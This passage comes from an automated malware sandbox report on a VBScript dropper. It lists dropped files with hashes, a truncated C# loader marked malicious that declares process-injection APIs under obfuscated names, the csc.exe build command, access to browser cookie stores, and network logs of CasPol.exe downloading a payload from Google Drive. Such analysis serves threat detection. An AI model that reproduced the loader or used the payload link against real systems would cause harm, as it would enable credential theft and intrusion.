SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_mfxogem4.yt2.psm1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\sepi5xx1\CSC7F7A267C826A46D5AA3589EC91649B9.TMP

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
File Type:	MSVC .res
Category:	dropped
Size (bytes):	652
Entropy (8bit):	3.1015556516706706
Encrypted:	false
SSDEEP:	12:DXt4Ii3ntuAHia5YA49aUGiqMZAiN5gry0Gak7YnqqPXPN5Dlq5J:+RI+ycuZhNBakSPPNnqX
MD5:	B3C8C491BB7B43D1E71ACCC2B0009B65
SHA1:	61E6838602DECE263E2D5093CBC0A06801A5AA07
SHA-256:	256C4D681B6AFDD18B49FEFADF98BD0A1860A51ACF4B4354B3A788735C194ECC
SHA-512:	8F7F6C97721DC51D8E11724117917A255AC7CAAD0927BA1427273B60C6E66EF0EEE516B69BA18A280554DDFB9840AA71EF1C139AB3054D9DC4C42F59BFBD2C4B
Malicious:	false
Preview:	.... ...........................L...<...............0...........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...s.e.p.i.5.x.x.1...d.l.l.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...D.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e...s.e.p.i.5.x.x.1...d.l.l.....4.....P.r.o.d.u.c.t.V.e.r.s.i.o.n...0...0...0...0...8.....A.s.s.e.m.b.l.y. .V.e.r.s.i.o.n...0...0...0...0...

C:\Users\user\AppData\Local\Temp\sepi5xx1\sepi5xx1.0.cs

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	UTF-8 Unicode (with BOM) text
Category:	dropped
Size (bytes):	1089
Entropy (8bit):	5.044097082778121
Encrypted:	false
SSDEEP:	24:JjCMXN3JlPoPLYfRNw0OwR36oXNJFROCeFqtIQncWT/nb5:JjXJlPTJNw05RKEFRLSiIQnjb5
MD5:	BAB58B4D01CB9D487F337E778AEE3251
SHA1:	31A8838D16570110D902D50CE68210239C9BA9FE
SHA-256:	49CD9D4513029E668A3B44A42FDA9F9C47DF27B4ED47919B1E9453C1A8593AFF
SHA-512:	3419D32784F2283F7CB00DF297DD041494734B5624C2AD586A84627622CBA5614CA9DCB400878D0218EAB4C32124BC9E8D1BEB101515DB31A07BC32C00C86BDD
Malicious:	true
Preview:	.using System;.using System.Runtime.InteropServices;.public static class Cladogenet1.{[DllImport("user32")]public static extern int CreateMDIWindow(int Nvhie,int Hea,int hatch,int Pini,int Overi,int Recita,int Opkr,int Crock,int Autos,int Retr);.[DllImport("winmm.dll")]public static extern int GetDriverModuleHandle(int Dis40);.[DllImport("user32")]public static extern int IsDlgButtonChecked(int Lysku,int Sinis94);.[DllImport("ADVAPI32.DLL")]public static extern int DeleteService(int Arc);.[DllImport("user32")]public static extern int CreateCaret(int Pokie,int Sup,int Biova137,int Ikastl);.[DllImport("kernel32")]public static extern void RtlMoveMemory(IntPtr uvor1,ref Int32 uvor2,int uvor3);.[DllImport("user32")]public static extern int GetFocus();.[DllImport("user32", EntryPoint="EnumWindows")]public static extern IntPtr Vitrusa32(uint uvor5,int uvor6);.[DllImport("kernel32")]public static extern int SetThreadContext(int Nedfot,int Nong);.[DllImport("kernel32", EntryPoint="VirtualAll

C:\Users\user\AppData\Local\Temp\sepi5xx1\sepi5xx1.cmdline

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	UTF-8 Unicode (with BOM) text, with very long lines, with no line terminators
Category:	dropped
Size (bytes):	371
Entropy (8bit):	5.250854508466307
Encrypted:	false
SSDEEP:	6:pAu+H2LvkuqJDdqxLTKbDdqB/6K2CN23fB0zxs7+AEszICN23fQA:p37Lvkmb6KmeWZE7IA
MD5:	FDD27AC45608EBA2666D2901A917AF06
SHA1:	8426632E4346542E11C6F0035B20FB51E1F26BA0
SHA-256:	54E8795D1A22DE5BA1C12A468B4069DB0D58292ADA84EF13E251D45BAD26B7BA
SHA-512:	17A916DFA79639FEA32340939248457C498FEF280A8C8878968547D7E03146702AB81FC77428F74663FB964AF67C15BB1045E03F5BAFCC3777F4F1889C78501F
Malicious:	true
Preview:	./t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /out:"C:\Users\user\AppData\Local\Temp\sepi5xx1\sepi5xx1.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\sepi5xx1\sepi5xx1.0.cs"

C:\Users\user\AppData\Local\Temp\sepi5xx1\sepi5xx1.dll

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	4096
Entropy (8bit):	3.0861292849676416
Encrypted:	false
SSDEEP:	48:6JpU3puvMUCtvj9JLB89RsFj53v1ulBa3Nq:WopsMjh9v89RewDK
MD5:	CAF2E2625FE5AE7ABE705E341282D1E5
SHA1:	4C1624D47A948912F3A6E77D6F9C3EC15034C4E5
SHA-256:	C41D08B79E9ED69517624FA3592A86CDB598627B491441B990BC878DA2EEA43B
SHA-512:	E3DFAE1450A58728453743E2F765F2106AB7B7F7697BBB6715FA76B8AA36193F10C395ACABA23E5172FFF5A2659AEE9B8C6B4E88F530B8E9A4C6073C5A907007
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....:c...........!................N&... ...@....... ....................................@..................................&..K....@.......................`....................................................... ............... ..H............text...T.... ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B................0&......H.......P ..............................................................BSJB............v4.0.30319......l...`...#~......X...#Strings....$.......#US.,.......#GUID...<...t...#Blob...........G.........%3............................................................3.,.....y.....y.......................................... :............ J............ `............ s............ ..#.......... ..+.......... ..3.......... ..7.......... ............. ..#.................................

C:\Users\user\AppData\Local\Temp\sepi5xx1\sepi5xx1.out

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	UTF-8 Unicode (with BOM) text, with very long lines, with CRLF, CR line terminators
Category:	modified
Size (bytes):	866
Entropy (8bit):	5.320830639943674
Encrypted:	false
SSDEEP:	24:Aqd3ka6KmfE7I1Kax5DqBVKVrdFAMBJTH:Aika6PfE7I1K2DcVKdBJj
MD5:	5F00FCD4162B7D2A5D44965AFADBD389
SHA1:	9A20186161DC6AF8C175AB99B184769BB26A9A36
SHA-256:	C9DDD9F7B205EFA028C365700FDEC6705D14407DDE14FFF9206690DC23439585
SHA-512:	C999F90D1CA5620F6B63DDA02F12605FA19BF100C6567676C56B6708386E3C2B93E367D3907F44C4FC052D35981CBE67BCFFDDECC2A943FB38548195FECBEA71
Malicious:	false
Preview:	.C:\Windows\system32> "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /out:"C:\Users\user\AppData\Local\Temp\sepi5xx1\sepi5xx1.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\sepi5xx1\sepi5xx1.0.cs"......Microsoft (R) Visual C# Compiler version 4.8.4084.0...for C# 5..Copyright (C) Microsoft Corporation. All rights reserved.......This compiler is provided as part of the Microsoft (R) .NET Framework, but only supports language versions up to C# 5, which is no longer the latest version. For compilers that support newer versions of the C# programming language, see http://go.microsoft.com/fwlink/?LinkID=533240....

C:\Users\user\AppData\Roaming\5drowjrx.mtw\Chrome\Default\Cookies

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
File Type:	SQLite 3.x database, last written using SQLite version 3036000
Category:	dropped
Size (bytes):	98304
Entropy (8bit):	2.9216957692876595
Encrypted:	false
SSDEEP:	384:ST8XNcKu0iTwbAziYN570RMZXVuKnQM2V6ofbDO4xmTgZcZygSA2O9RVHfwrhhxV:JNcgiD5Q6luKQM2V7DXcAgSA2KD4jL
MD5:	1A706D20E96086886B5D00D9698E09DF
SHA1:	DACF81D90647457585345BEDD6DE222E83FDE01F
SHA-256:	759F62B61AA65D6D5FAC95086B26D1D053CE1FB24A8A0537ACB42DDF45D2F19F
SHA-512:	CFF7D42AA3B089759C5ACE934A098009D1A58111FE7D99AC7669B7F0A1C973907FD16A4DC1F37B5BE5252EC51B8D876511F4F6317583FA9CC48897B1B913C7F3
Malicious:	false
Preview:	SQLite format 3......@ ...$...................................................................$..S`.........g.....[.[.[................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\5drowjrx.mtw\Firefox\Profiles\ol7uiqa8.default-release\cookies.sqlite

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
File Type:	SQLite 3.x database, user version 12, last written using SQLite version 3036000
Category:	modified
Size (bytes):	98304
Entropy (8bit):	0.08231524779339361
Encrypted:	false
SSDEEP:	12:DQANJfWk73Fmdmc/OPVJXfPNn43etRRfYR5O8atLqxeYaNcDakMG/lO:DQANJff32mNVpP965Ra8KN0MG/lO
MD5:	886A5F9308577FDF19279AA582D0024D
SHA1:	CDCCC11837CDDB657EB0EF6A01202451ECDF4992
SHA-256:	BA7EB45B7E9B6990BC63BE63836B74FA2CCB64DCD0C199056B6AE37B1AE735F2
SHA-512:	FF0692E52368708B36C161A4BFA91EE01CCA1B86F66666F7FC4979C6792D598FF7720A9FAF258F61439DAD61DB55C50D992E99769B1E4D321EC5B98230684BC5
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................S`.....}..}...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

\Device\ConDrv

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	30
Entropy (8bit):	3.964735178725505
Encrypted:	false
SSDEEP:	3:IBVFBWAGRHneyy:ITqAGRHner
MD5:	9F754B47B351EF0FC32527B541420595
SHA1:	006C66220B33E98C725B73495FE97B3291CE14D9
SHA-256:	0219D77348D2F0510025E188D4EA84A8E73F856DEB5E0878D673079D05840591
SHA-512:	C6996379BCB774CE27EEEC0F173CBACC70CA02F3A773DD879E3A42DA554535A94A9C13308D14E873C71A338105804AFFF32302558111EE880BA0C41747A08532
Malicious:	false
Preview:	NordVPN directory not found!..

Static File Info

General

File type:	ASCII text, with CRLF line terminators
Entropy (8bit):	5.150359651157965
TrID:	Visual Basic Script (13500/0) 100.00%
File name:	PUMP mt310143121.vbs
File size:	517402
MD5:	41ad96654d44ef375097eeeb83818cf7
SHA1:	20dae7bc9d6dc2c5f947de3f871d617fb36e6edc
SHA256:	28bf271ec1576c0e7d1b2a243de952bb70c25711cdc9c2d4494002a3e2f346ca
SHA512:	e0e756b9ccc37a1fee30ff1145bf9c3b28e441bfe7c1fa47face7afd4a4db6acdf6b8a346e5f6149ea085ad35648bd950e7e48c57f5fc61f14ec7bfe7d0156e2
SSDEEP:	6144:GYvp0UseCb/CHsE2Nydr8HSMB3567Fk2AhcAjI4PWTO:LpCbwq50ZAhLjVWC
TLSH:	19B4407B5423D0ACA7DEE2634C603EFD85D8F909C2E517AA223637C49913AFB5742E14
File Content Preview:	..'Heterogeneously46 UDTMTE GKKERIER Kinesertraadene EVECTIONS corrive Konfektens2 Aarsberetning Schoolteacherly SANDSTORMENE uvelkommen ..'Rimede210 Betydede229 embodier Dimeric221 Forebyggelsers Fornjelsessyges135 ..'hubristically ANTIHYPNOTIC KLANGLS B

File Icon


Icon Hash:	e8d69ece869a9ec4

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Oct 3, 2022 16:13:30.197988033 CEST	49807	443	192.168.11.20	142.250.186.46
Oct 3, 2022 16:13:30.198057890 CEST	443	49807	142.250.186.46	192.168.11.20
Oct 3, 2022 16:13:30.198353052 CEST	49807	443	192.168.11.20	142.250.186.46
Oct 3, 2022 16:13:30.256292105 CEST	49807	443	192.168.11.20	142.250.186.46
Oct 3, 2022 16:13:30.256309986 CEST	443	49807	142.250.186.46	192.168.11.20
Oct 3, 2022 16:13:30.291635990 CEST	443	49807	142.250.186.46	192.168.11.20
Oct 3, 2022 16:13:30.291856050 CEST	49807	443	192.168.11.20	142.250.186.46
Oct 3, 2022 16:13:30.292381048 CEST	443	49807	142.250.186.46	192.168.11.20
Oct 3, 2022 16:13:30.292687893 CEST	49807	443	192.168.11.20	142.250.186.46
Oct 3, 2022 16:13:30.500511885 CEST	49807	443	192.168.11.20	142.250.186.46
Oct 3, 2022 16:13:30.501226902 CEST	443	49807	142.250.186.46	192.168.11.20
Oct 3, 2022 16:13:30.501494884 CEST	49807	443	192.168.11.20	142.250.186.46
Oct 3, 2022 16:13:30.514873981 CEST	49807	443	192.168.11.20	142.250.186.46
Oct 3, 2022 16:13:30.558656931 CEST	443	49807	142.250.186.46	192.168.11.20
Oct 3, 2022 16:13:31.163913965 CEST	443	49807	142.250.186.46	192.168.11.20
Oct 3, 2022 16:13:31.164235115 CEST	49807	443	192.168.11.20	142.250.186.46
Oct 3, 2022 16:13:31.165873051 CEST	443	49807	142.250.186.46	192.168.11.20
Oct 3, 2022 16:13:31.166030884 CEST	443	49807	142.250.186.46	192.168.11.20
Oct 3, 2022 16:13:31.166107893 CEST	49807	443	192.168.11.20	142.250.186.46
Oct 3, 2022 16:13:31.166213989 CEST	49807	443	192.168.11.20	142.250.186.46
Oct 3, 2022 16:13:31.166265011 CEST	49807	443	192.168.11.20	142.250.186.46
Oct 3, 2022 16:13:31.166311979 CEST	443	49807	142.250.186.46	192.168.11.20
Oct 3, 2022 16:13:31.166323900 CEST	49807	443	192.168.11.20	142.250.186.46
Oct 3, 2022 16:13:31.166584015 CEST	49807	443	192.168.11.20	142.250.186.46
Oct 3, 2022 16:13:31.355093956 CEST	49808	443	192.168.11.20	142.250.185.161
Oct 3, 2022 16:13:31.355195045 CEST	443	49808	142.250.185.161	192.168.11.20
Oct 3, 2022 16:13:31.355351925 CEST	49808	443	192.168.11.20	142.250.185.161
Oct 3, 2022 16:13:31.355701923 CEST	49808	443	192.168.11.20	142.250.185.161
Oct 3, 2022 16:13:31.355753899 CEST	443	49808	142.250.185.161	192.168.11.20
Oct 3, 2022 16:13:31.409158945 CEST	443	49808	142.250.185.161	192.168.11.20
Oct 3, 2022 16:13:31.409368992 CEST	49808	443	192.168.11.20	142.250.185.161
Oct 3, 2022 16:13:31.409492970 CEST	49808	443	192.168.11.20	142.250.185.161
Oct 3, 2022 16:13:31.411214113 CEST	443	49808	142.250.185.161	192.168.11.20
Oct 3, 2022 16:13:31.411385059 CEST	49808	443	192.168.11.20	142.250.185.161
Oct 3, 2022 16:13:31.411405087 CEST	49808	443	192.168.11.20	142.250.185.161
Oct 3, 2022 16:13:31.414860964 CEST	49808	443	192.168.11.20	142.250.185.161
Oct 3, 2022 16:13:31.414884090 CEST	443	49808	142.250.185.161	192.168.11.20
Oct 3, 2022 16:13:31.415190935 CEST	443	49808	142.250.185.161	192.168.11.20
Oct 3, 2022 16:13:31.415432930 CEST	49808	443	192.168.11.20	142.250.185.161
Oct 3, 2022 16:13:31.415771008 CEST	49808	443	192.168.11.20	142.250.185.161
Oct 3, 2022 16:13:31.458560944 CEST	443	49808	142.250.185.161	192.168.11.20
Oct 3, 2022 16:13:31.667599916 CEST	443	49808	142.250.185.161	192.168.11.20
Oct 3, 2022 16:13:31.667885065 CEST	49808	443	192.168.11.20	142.250.185.161
Oct 3, 2022 16:13:31.667948008 CEST	443	49808	142.250.185.161	192.168.11.20
Oct 3, 2022 16:13:31.668064117 CEST	49808	443	192.168.11.20	142.250.185.161
Oct 3, 2022 16:13:31.668234110 CEST	443	49808	142.250.185.161	192.168.11.20
Oct 3, 2022 16:13:31.668375969 CEST	49808	443	192.168.11.20	142.250.185.161
Oct 3, 2022 16:13:31.668466091 CEST	49808	443	192.168.11.20	142.250.185.161
Oct 3, 2022 16:13:31.668513060 CEST	49808	443	192.168.11.20	142.250.185.161
Oct 3, 2022 16:13:31.669502974 CEST	443	49808	142.250.185.161	192.168.11.20
Oct 3, 2022 16:13:31.669800043 CEST	49808	443	192.168.11.20	142.250.185.161
Oct 3, 2022 16:13:31.670139074 CEST	443	49808	142.250.185.161	192.168.11.20
Oct 3, 2022 16:13:31.670422077 CEST	49808	443	192.168.11.20	142.250.185.161
Oct 3, 2022 16:13:31.670478106 CEST	443	49808	142.250.185.161	192.168.11.20
Oct 3, 2022 16:13:31.670744896 CEST	49808	443	192.168.11.20	142.250.185.161
Oct 3, 2022 16:13:31.672609091 CEST	443	49808	142.250.185.161	192.168.11.20
Oct 3, 2022 16:13:31.672878981 CEST	49808	443	192.168.11.20	142.250.185.161
Oct 3, 2022 16:13:31.675905943 CEST	443	49808	142.250.185.161	192.168.11.20
Oct 3, 2022 16:13:31.676264048 CEST	49808	443	192.168.11.20	142.250.185.161
Oct 3, 2022 16:13:31.678153038 CEST	443	49808	142.250.185.161	192.168.11.20
Oct 3, 2022 16:13:31.678319931 CEST	49808	443	192.168.11.20	142.250.185.161
Oct 3, 2022 16:13:31.678366899 CEST	443	49808	142.250.185.161	192.168.11.20
Oct 3, 2022 16:13:31.678528070 CEST	49808	443	192.168.11.20	142.250.185.161
Oct 3, 2022 16:13:31.678590059 CEST	443	49808	142.250.185.161	192.168.11.20
Oct 3, 2022 16:13:31.678735018 CEST	49808	443	192.168.11.20	142.250.185.161
Oct 3, 2022 16:13:31.678767920 CEST	443	49808	142.250.185.161	192.168.11.20
Oct 3, 2022 16:13:31.678914070 CEST	49808	443	192.168.11.20	142.250.185.161
Oct 3, 2022 16:13:31.678939104 CEST	443	49808	142.250.185.161	192.168.11.20
Oct 3, 2022 16:13:31.678958893 CEST	443	49808	142.250.185.161	192.168.11.20
Oct 3, 2022 16:13:31.679240942 CEST	49808	443	192.168.11.20	142.250.185.161
Oct 3, 2022 16:13:31.679584980 CEST	443	49808	142.250.185.161	192.168.11.20
Oct 3, 2022 16:13:31.679858923 CEST	49808	443	192.168.11.20	142.250.185.161
Oct 3, 2022 16:13:31.679917097 CEST	443	49808	142.250.185.161	192.168.11.20
Oct 3, 2022 16:13:31.680123091 CEST	49808	443	192.168.11.20	142.250.185.161
Oct 3, 2022 16:13:31.680243969 CEST	443	49808	142.250.185.161	192.168.11.20
Oct 3, 2022 16:13:31.680490971 CEST	49808	443	192.168.11.20	142.250.185.161
Oct 3, 2022 16:13:31.680545092 CEST	443	49808	142.250.185.161	192.168.11.20
Oct 3, 2022 16:13:31.680783987 CEST	49808	443	192.168.11.20	142.250.185.161
Oct 3, 2022 16:13:31.681057930 CEST	443	49808	142.250.185.161	192.168.11.20
Oct 3, 2022 16:13:31.681195021 CEST	49808	443	192.168.11.20	142.250.185.161
Oct 3, 2022 16:13:31.681231022 CEST	443	49808	142.250.185.161	192.168.11.20
Oct 3, 2022 16:13:31.681442976 CEST	49808	443	192.168.11.20	142.250.185.161
Oct 3, 2022 16:13:31.681730032 CEST	443	49808	142.250.185.161	192.168.11.20
Oct 3, 2022 16:13:31.681895018 CEST	49808	443	192.168.11.20	142.250.185.161
Oct 3, 2022 16:13:31.681932926 CEST	443	49808	142.250.185.161	192.168.11.20
Oct 3, 2022 16:13:31.682137012 CEST	49808	443	192.168.11.20	142.250.185.161
Oct 3, 2022 16:13:31.682405949 CEST	443	49808	142.250.185.161	192.168.11.20
Oct 3, 2022 16:13:31.682707071 CEST	49808	443	192.168.11.20	142.250.185.161
Oct 3, 2022 16:13:31.682775021 CEST	443	49808	142.250.185.161	192.168.11.20
Oct 3, 2022 16:13:31.683012962 CEST	49808	443	192.168.11.20	142.250.185.161
Oct 3, 2022 16:13:31.683156013 CEST	443	49808	142.250.185.161	192.168.11.20
Oct 3, 2022 16:13:31.683330059 CEST	49808	443	192.168.11.20	142.250.185.161
Oct 3, 2022 16:13:31.683367014 CEST	443	49808	142.250.185.161	192.168.11.20
Oct 3, 2022 16:13:31.683584929 CEST	49808	443	192.168.11.20	142.250.185.161
Oct 3, 2022 16:13:31.683676004 CEST	443	49808	142.250.185.161	192.168.11.20
Oct 3, 2022 16:13:31.683973074 CEST	49808	443	192.168.11.20	142.250.185.161
Oct 3, 2022 16:13:31.684017897 CEST	443	49808	142.250.185.161	192.168.11.20
Oct 3, 2022 16:13:31.684273958 CEST	49808	443	192.168.11.20	142.250.185.161
Oct 3, 2022 16:13:31.684443951 CEST	443	49808	142.250.185.161	192.168.11.20
Oct 3, 2022 16:13:31.684647083 CEST	49808	443	192.168.11.20	142.250.185.161

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Oct 3, 2022 16:13:30.168185949 CEST	53449	53	192.168.11.20	1.1.1.1
Oct 3, 2022 16:13:30.177548885 CEST	53	53449	1.1.1.1	192.168.11.20
Oct 3, 2022 16:13:31.314471960 CEST	61911	53	192.168.11.20	1.1.1.1
Oct 3, 2022 16:13:31.353728056 CEST	53	61911	1.1.1.1	192.168.11.20
Oct 3, 2022 16:13:54.071614027 CEST	53511	53	192.168.11.20	1.1.1.1
Oct 3, 2022 16:13:54.376816034 CEST	53	53511	1.1.1.1	192.168.11.20

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Oct 3, 2022 16:13:30.168185949 CEST	192.168.11.20	1.1.1.1	0x14e2	Standard query (0)	drive.google.com	A (IP address)	IN (0x0001)	false
Oct 3, 2022 16:13:31.314471960 CEST	192.168.11.20	1.1.1.1	0x691c	Standard query (0)	doc-04-9o-docs.googleusercontent.com	A (IP address)	IN (0x0001)	false
Oct 3, 2022 16:13:54.071614027 CEST	192.168.11.20	1.1.1.1	0xe373	Standard query (0)	mail.prgisi.com	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Oct 3, 2022 16:11:03.518526077 CEST	1.1.1.1	192.168.11.20	0x4433	No error (0)	devcenterapi.azure-api.net	apimgmttmr17ij3jt5dneg64srod9jevcuajxaoube4brtu9cq.trafficmanager.net		CNAME (Canonical name)	IN (0x0001)	false
Oct 3, 2022 16:11:03.518526077 CEST	1.1.1.1	192.168.11.20	0x4433	No error (0)	devcenterapi-eastus-01.regional.azure-api.net	apimgmthszbjimgeglorvthkncixvpso9vnynvh3ehmsdll33a.cloudapp.net		CNAME (Canonical name)	IN (0x0001)	false
Oct 3, 2022 16:13:30.177548885 CEST	1.1.1.1	192.168.11.20	0x14e2	No error (0)	drive.google.com		142.250.186.46	A (IP address)	IN (0x0001)	false
Oct 3, 2022 16:13:31.353728056 CEST	1.1.1.1	192.168.11.20	0x691c	No error (0)	doc-04-9o-docs.googleusercontent.com	googlehosted.l.googleusercontent.com		CNAME (Canonical name)	IN (0x0001)	false
Oct 3, 2022 16:13:31.353728056 CEST	1.1.1.1	192.168.11.20	0x691c	No error (0)	googlehosted.l.googleusercontent.com		142.250.185.161	A (IP address)	IN (0x0001)	false
Oct 3, 2022 16:13:54.376816034 CEST	1.1.1.1	192.168.11.20	0xe373	No error (0)	mail.prgisi.com		216.218.206.36	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

drive.google.com

doc-04-9o-docs.googleusercontent.com

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
0	192.168.11.20	49807	142.250.186.46	443	C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe

Timestamp	kBytes transferred	Direction	Data
2022-10-03 14:13:30 UTC	0	OUT	GET /uc?export=download&id=1PlMJJbtOYPK_UFYPas9qhiHRn_ix8EHC HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko Host: drive.google.com Cache-Control: no-cache
2022-10-03 14:13:31 UTC	0	IN	HTTP/1.1 303 See Other Content-Type: application/binary Cache-Control: no-cache, no-store, max-age=0, must-revalidate Pragma: no-cache Expires: Mon, 01 Jan 1990 00:00:00 GMT Date: Mon, 03 Oct 2022 14:13:31 GMT Location: https://doc-04-9o-docs.googleusercontent.com/docs/securesc/ha0ro937gcuc7l7deffksulhg5h7mbp1/eo32nv6hlr1tkp3eh3vjbce1k0vd1dfr/1664806350000/11764323936253178614//1PlMJJbtOYPK_UFYPas9qhiHRn_ix8EHC?e=download&uuid=b16c09ae-0bb5-4390-9a1a-296b303d6b25 Strict-Transport-Security: max-age=31536000 Content-Security-Policy: script-src 'nonce-Q7oEPH4O0j1rpxAcc86Guw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self' Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport Cross-Origin-Opener-Policy: same-origin Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version Permissions-Policy: ch-ua-arch=, ch-ua-bitness=, ch-ua-full-version=, ch-ua-full-version-list=, ch-ua-model=, ch-ua-wow64=, ch-ua-platform=, ch-ua-platform-version=* Server: ESF Content-Length: 0 X-XSS-Protection: 0 X-Frame-Options: SAMEORIGIN X-Content-Type-Options: nosniff Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43" Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
1	192.168.11.20	49808	142.250.185.161	443	C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe

Timestamp	kBytes transferred	Direction	Data
2022-10-03 14:13:31 UTC	1	OUT	GET /docs/securesc/ha0ro937gcuc7l7deffksulhg5h7mbp1/eo32nv6hlr1tkp3eh3vjbce1k0vd1dfr/1664806350000/11764323936253178614/*/1PlMJJbtOYPK_UFYPas9qhiHRn_ix8EHC?e=download&uuid=b16c09ae-0bb5-4390-9a1a-296b303d6b25 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko Cache-Control: no-cache Host: doc-04-9o-docs.googleusercontent.com Connection: Keep-Alive
2022-10-03 14:13:31 UTC	2	IN	HTTP/1.1 200 OK X-GUploader-UploadID: ADPycdu7QBwDTDrLYkUy32Ygwr2YxyqmGVwi-iAt7lnHkZhV8osplJIq4k1Rz5suLUCabTVsnQDmcy1Nvz6GBd1VkQiQFQ Content-Type: application/octet-stream Content-Disposition: attachment; filename="nRdNTJOgFp231.mix"; filename=UTF-8''nRdNTJOgFp231.mix Access-Control-Allow-Origin: Access-Control-Allow-Credentials: false Access-Control-Allow-Headers: Accept, Accept-Language, Authorization, Cache-Control, Content-Disposition, Content-Encoding, Content-Language, Content-Length, Content-MD5, Content-Range, Content-Type, Date, developer-token, financial-institution-id, X-Goog-Sn-Metadata, X-Goog-Sn-PatientId, GData-Version, google-cloud-resource-prefix, linked-customer-id, login-customer-id, x-goog-request-params, Host, If-Match, If-Modified-Since, If-None-Match, If-Unmodified-Since, Origin, OriginToken, Pragma, Range, request-id, Slug, Transfer-Encoding, hotrod-board-name, hotrod-chrome-cpu-model, hotrod-chrome-processors, Want-Digest, X-Ad-Manager-Impersonation, x-chrome-connected, X-ClientDetails, X-Client-Version, X-Firebase-Locale, X-Goog-Firebase-Installations-Auth, X-Firebase-Client, X-Firebase-Client-Log-Type, X-Firebase-GMPID, X-Firebase-Auth-Token, X-Firebase-AppCheck, X-Goog-Drive-Client-Version, X-Goog-Drive-Resource-Keys, X-GData-Client, X-GData-Key, X-GoogApps-Allowed-Domains, 